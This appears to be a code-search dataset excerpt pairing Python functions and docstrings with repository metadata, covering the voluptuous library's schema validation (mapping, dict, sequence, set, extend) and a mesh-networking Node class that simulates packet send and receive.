"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema.extend | python | def extend(self, schema, required=None, extra=None):
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra) | Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema` | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L725-L782 | [
"def iteritems(d):\n return d.items()\n",
"def extend(self, schema, required=None, extra=None):\n \"\"\"Create a new `Schema` by merging this and the provided `schema`.\n\n Neither this `Schema` nor the provided `schema` are modified. The\n resulting `Schema` inherits the `required` and `extra` parame... | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
|
pirate/mesh-networking | mesh/node.py | Node._generate_MAC | python | def _generate_MAC(segments=6, segment_length=2, delimiter=":", charset="0123456789abcdef"):
addr = []
for _ in range(segments):
sub = ''.join(random.choice(charset) for _ in range(segment_length))
addr.append(sub)
return delimiter.join(addr) | generate a non-guaranteed-unique mac address | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/node.py#L57-L63 | null | class Node(threading.Thread):
"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to.
Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle.
Programs process packets off the node's incoming queue, then send responses out through node's outbound filters,
and finally out to the right network interface.
"""
def __init__(self, interfaces=None, name="n1", promiscuous=False, mac_addr=None, Filters=(), Program=None):
threading.Thread.__init__(self)
self.name = name
self.interfaces = interfaces or []
self.keep_listening = True
self.promiscuous = promiscuous
self.mac_addr = mac_addr or self._generate_MAC(6, 2)
self.inq = defaultdict(Queue) # TODO: convert to bounded ring-buffer
self.filters = [LoopbackFilter()] + [F() for F in Filters] # initialize the filters that shape incoming and outgoing traffic before it hits the program
self.program = Program(node=self) if Program else None # init the program that will be processing incoming packets
def __repr__(self):
return "[{0}]".format(self.name)
def __str__(self):
return self.__repr__()
@staticmethod
def log(self, *args):
"""stdout and stderr for the node"""
print("%s %s" % (str(self).ljust(8), " ".join(str(x) for x in args)))
def stop(self):
self.keep_listening = False
if self.program:
self.program.stop()
self.join()
return True
### Runloop
def run(self):
"""runloop that gets triggered by node.start()
reads new packets off the link and feeds them to recv()
"""
if self.program:
self.program.start()
while self.keep_listening:
for interface in self.interfaces:
packet = interface.recv(self.mac_addr if not self.promiscuous else "00:00:00:00:00:00")
if packet:
self.recv(packet, interface)
time.sleep(0.01)
self.log("Stopped listening.")
### IO
def recv(self, packet, interface):
"""run incoming packet through the filters, then place it in its inq"""
# the packet is piped into the first filter, then the result of that into the second filter, etc.
for f in self.filters:
if not packet:
break
packet = f.tr(packet, interface)
if packet:
# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq
# self.log("IN ", str(interface).ljust(30), packet.decode())
self.inq[interface].put(packet)
def send(self, packet, interfaces=None):
"""write packet to given interfaces, default is broadcast to all interfaces"""
interfaces = interfaces or self.interfaces # default to all interfaces
interfaces = interfaces if hasattr(interfaces, '__iter__') else [interfaces]
for interface in interfaces:
for f in self.filters:
packet = f.tx(packet, interface) # run outgoing packet through the filters
if packet:
# if not dropped, log the transmit and pass it to the interface's send method
# self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode())
interface.send(packet)
|
pirate/mesh-networking | mesh/node.py | Node.run | python | def run(self):
if self.program:
self.program.start()
while self.keep_listening:
for interface in self.interfaces:
packet = interface.recv(self.mac_addr if not self.promiscuous else "00:00:00:00:00:00")
if packet:
self.recv(packet, interface)
time.sleep(0.01)
self.log("Stopped listening.") | runloop that gets triggered by node.start()
reads new packets off the link and feeds them to recv() | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/node.py#L78-L90 | [
"def log(self, *args):\n \"\"\"stdout and stderr for the node\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join(str(x) for x in args)))\n",
"def recv(self, packet, interface):\n \"\"\"run incoming packet through the filters, then place it in its inq\"\"\"\n # the packet is piped into the first... | class Node(threading.Thread):
"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to.
Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle.
Programs process packets off the node's incoming queue, then send responses out through node's outbound filters,
and finally out to the right network interface.
"""
def __init__(self, interfaces=None, name="n1", promiscuous=False, mac_addr=None, Filters=(), Program=None):
threading.Thread.__init__(self)
self.name = name
self.interfaces = interfaces or []
self.keep_listening = True
self.promiscuous = promiscuous
self.mac_addr = mac_addr or self._generate_MAC(6, 2)
self.inq = defaultdict(Queue) # TODO: convert to bounded ring-buffer
self.filters = [LoopbackFilter()] + [F() for F in Filters] # initialize the filters that shape incoming and outgoing traffic before it hits the program
self.program = Program(node=self) if Program else None # init the program that will be processing incoming packets
def __repr__(self):
return "[{0}]".format(self.name)
def __str__(self):
return self.__repr__()
@staticmethod
def _generate_MAC(segments=6, segment_length=2, delimiter=":", charset="0123456789abcdef"):
"""generate a non-guaranteed-unique mac address"""
addr = []
for _ in range(segments):
sub = ''.join(random.choice(charset) for _ in range(segment_length))
addr.append(sub)
return delimiter.join(addr)
def log(self, *args):
"""stdout and stderr for the node"""
print("%s %s" % (str(self).ljust(8), " ".join(str(x) for x in args)))
def stop(self):
self.keep_listening = False
if self.program:
self.program.stop()
self.join()
return True
### Runloop
### IO
def recv(self, packet, interface):
"""run incoming packet through the filters, then place it in its inq"""
# the packet is piped into the first filter, then the result of that into the second filter, etc.
for f in self.filters:
if not packet:
break
packet = f.tr(packet, interface)
if packet:
# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq
# self.log("IN ", str(interface).ljust(30), packet.decode())
self.inq[interface].put(packet)
def send(self, packet, interfaces=None):
"""write packet to given interfaces, default is broadcast to all interfaces"""
interfaces = interfaces or self.interfaces # default to all interfaces
interfaces = interfaces if hasattr(interfaces, '__iter__') else [interfaces]
for interface in interfaces:
for f in self.filters:
packet = f.tx(packet, interface) # run outgoing packet through the filters
if packet:
# if not dropped, log the transmit and pass it to the interface's send method
# self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode())
interface.send(packet)
|
pirate/mesh-networking | mesh/node.py | Node.recv | python | def recv(self, packet, interface):
# the packet is piped into the first filter, then the result of that into the second filter, etc.
for f in self.filters:
if not packet:
break
